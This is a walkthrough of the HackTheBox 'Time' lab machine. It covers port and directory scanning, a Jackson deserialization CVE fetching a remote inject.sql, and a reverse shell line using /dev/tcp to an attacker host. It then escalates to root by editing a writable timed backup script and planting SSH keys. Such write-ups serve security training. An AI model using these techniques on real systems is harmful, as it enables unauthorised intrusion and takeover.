Time Walkthrough
Hey Everyone! Today we have one of HackTheBox machines βTimeβ which is medium level, letβs take a look at its info

Itβs based on Linux OS and depends on CVEs for foothold exploits, letβs get startedβ¦
What we will do?
As usual, we have some steps which we follow to pwn any machine, our steps are:
Reporting / Analysis
After finishing our steps we will have this information, stay calm and follow the reading :)

Information Gathering
In this step, we aim to collect all this information, which we can collect on a specific target like its open ports, security mode of login systems, directories, OS version, services versions, etc
Nmap
We will start this step by scanning all ports to discover the open ports and know where we will get into this machine
nmap -A -T4 10.10.10.214

It has only 2 open ports ssh/http
and for the services which run on them, theyβre not vulnerable βI know thatβ
So letβs check the website
HTTP Enumeration
After accessing the port 80
we have found this

Itβs an online JSON Beautifier validator
after checking the source code, I found nothing
The next step is to check the directories, so I used dirsearch
to do this task, and it returned these results
python3 dirsearch.py -u 10.10.10.214

I donβt see any interesting directories so to check for that Iβve used gobuster
with different word list
gobuster dir -u 10.10.10.214 -w /path/to/wordlist -l

The same results, so lets returned to the website and try every function there.
Scanning
In this step, we aim to scan all collected info from the previous one.
After trying to validate some text by using validate(Beta)
Iβve found this error


The validation process depends on fasterxml.jackson.
Actually, I donβt know whatβs this !! But after searching about it, I know that itβs something related to JAVA and used for text validation, after searching for any exploit for these words, I have found this CVE

Gaining Access
It works locally as you will see in the repo but after understanding the methodology of it you can edit the execution method to make it remote and to be honest, I asked my friend also about it :)
Hereβs the code after and before editing it

The first command itβs the original one which you will find in the repo and the second is the edited command to work as remotely
Note that it will get a file called inject.sql
from the attacker machine and then use it to exploit the vulnerability, so Iβve downloaded it and edited the command which will execute on the server to return a reverse shell bash -i >& /dev/tcp/attacker-ip/port 0>&1

The next step is to execute this command in the text validator area and use nc
to listen over the port which you typed in the payload


It works and we have a shell now

Maintaining Access
For this step, Iβve performed multiple tasks to get the root privileges:
Enumerate the directories and files for any leaked data
Use Exploit-Suggester tools to discover the kernel vulnerabilities
Use automation tools to perform multiple tasks like
linPEAS
orlinenum
Use
PsPy
to listen for the executed processes to watch and note if thereβs any process that can lead me to the root flag
After enumerating the system directories and files, I donβt find anything, so letβs go to the next stepβ¦
Iβve transported all required tools into my vulnerable machine

After executing the suggester script, it doesnβt discover anything

Letβs use PsPy

Iβve noticed that thereβs a process that executed every few seconds as you can see and after accessing the file /usr/bin/timer_backup.sh

Iβve found that I have the permission to edit, so I inserted into it a command which gets the root flag to a /home
directory

And as you can see, it works β€
Also, you can insert your ssh keys into the root directory and open a root shell using ssh
Congrats β€
Stay in touch
Last updated